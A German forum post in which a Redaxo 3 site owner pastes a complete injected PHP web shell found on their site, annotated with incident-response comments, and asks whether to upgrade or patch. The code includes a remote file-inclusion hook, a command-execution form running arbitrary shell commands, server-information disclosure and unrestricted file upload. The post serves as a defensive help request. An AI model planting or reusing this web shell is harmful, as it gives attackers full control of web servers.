Ich habe leider noch Redaxo 3.* installiert. Wahrscheinlich wurde eine Code-Injection vorgenommen.

echo "<!-- the bunny is running over the ocean -->";
// Injected backdoor, part 1: arbitrary file inclusion.
// If the request carries a parameter named "cr4nk", its raw value is handed
// straight to include(), so whatever file it names is executed as PHP with
// the rights of this script. No validation or allow-list is applied.
// For incident response: requests containing "cr4nk" in the web server
// access log are a direct indicator that this code path was used. Values
// sent in a POST body are usually not logged — verify against the server's
// logging configuration before treating an empty search as a clean result.
if (isset ($_REQUEST["cr4nk"])){
include($_REQUEST["cr4nk"]);
// Terminates the request here, so nothing after this block runs or is
// rendered when the include path is taken.
exit;
}
// Injected backdoor, part 2: operator page.
// Emits an HTML page (green-on-black styling) whose header discloses the
// SERVER_SOFTWARE environment value and the php_uname() string to anyone
// who requests this script.
echo '<html>
<style type="text/css">
body {
font-family:Fixedsys;
font-size:3px;
color:#00ff00;
BACKGROUND-COLOR: #000000;
margin:0px;
padding:0px;
}
textarea {
BORDER: #00ff00 1px solid;
BACKGROUND-COLOR: #000000;
font: Fixedsys bold;
color: #00ff00;
}
</style>
<body>
<html>
<div style="border-bottom:solid 1px #00ff00;width:100%">
<b>software:</b> '.getenv("SERVER_SOFTWARE").'<br>
<b>uname -a:</b> '.php_uname().'<br>
<b>safe-mode:</b> ';
// Reads the safe_mode ini setting into $safemode, but the ternary tests
// $safe_mode (a different variable that is never assigned here), so as
// written this prints "OFF" regardless of the real setting. The @ suppresses
// any warning from ini_get().
$safemode = @ini_get("safe_mode"); echo (($safe_mode)?("<font color=red>ON</font>"):("OFF"));
// Second half of the page: two forms without an action attribute, so both
// submit by POST back to this same URL — a text field named "cmd" and a
// multipart file field named "file". The statement ends by opening a
// <textarea>; anything echoed after this point lands inside it.
echo '
</div>
<div style="border-bottom:solid 1px #00ff00;width:100%">
<div style="margin:6px;margin-left:150px;">
<div style="float:left; margin-right:10px;"><form method="post"><input type="text" name="cmd" size="95"><input type=submit value="Exec"></form></div>
<div><form enctype="multipart/form-data" method="post"><input type="file" name="file"><input type=submit value="Upload"></form></div>
</div>
</div>
<div style="margin-left:150px;margin-top:5px";>
<textarea cols="121" rows="15">';
// Injected backdoor, part 3: operating-system command execution.
// The POST field "cmd" is taken unmodified and run as a command with the
// rights of the PHP process. The branches below try exec, shell_exec,
// system and passthru in that order (selected with function_exists()), then
// fall back to popen; only the first branch that applies is used. Every call
// is prefixed with @, so failures produce no visible warning.
// Hardening note: this path depends on PHP's process-execution functions
// being callable. Restricting them (php.ini disable_functions) is a common
// mitigation where the site does not need them — confirm against the
// application's requirements. It does not remove the backdoor itself.
if (isset ($_POST['cmd'])){
$cfe = $_POST['cmd'];
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
// exec() collects the output lines into $res, which are then joined
// with newlines into a single string.
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
// shell_exec() returns the command output directly.
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
// system() prints its output, so output buffering is used to capture
// it into $res instead of sending it immediately.
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
// Same buffering approach as the system() branch.
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
// Last fallback: read the process pipe in 1024-byte chunks until EOF.
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
// The captured output is written into the response without any escaping.
echo $res;
}
// Injected backdoor, part 4: unrestricted file upload.
// When a file arrives in the "file" field, its temporary copy is copied to a
// destination taken from the client-supplied file name. There is no check of
// extension, type or size, and copy() is used rather than
// move_uploaded_file(). The destination is a relative path — presumably
// resolved against the script's working directory; verify on the affected host.
// For incident response: files written through this path are unlikely to be
// removed by upgrading the CMS. Look for unexpected files (especially
// executable script types) near the infected script and compare the
// installation against a known-good copy.
if (isset ($_FILES['file']['tmp_name'])){
$tempname = $_FILES['file']['tmp_name'];
$name = $_FILES['file']['name'];
if(copy("$tempname", "$name")){
echo "File uploaded";
}
else {
echo "File not uploaded!";
}
}
echo '

Soll ich am besten auf Redaxo 4 updaten? Oder hat jemand einen Quickfix für die 3er-Version?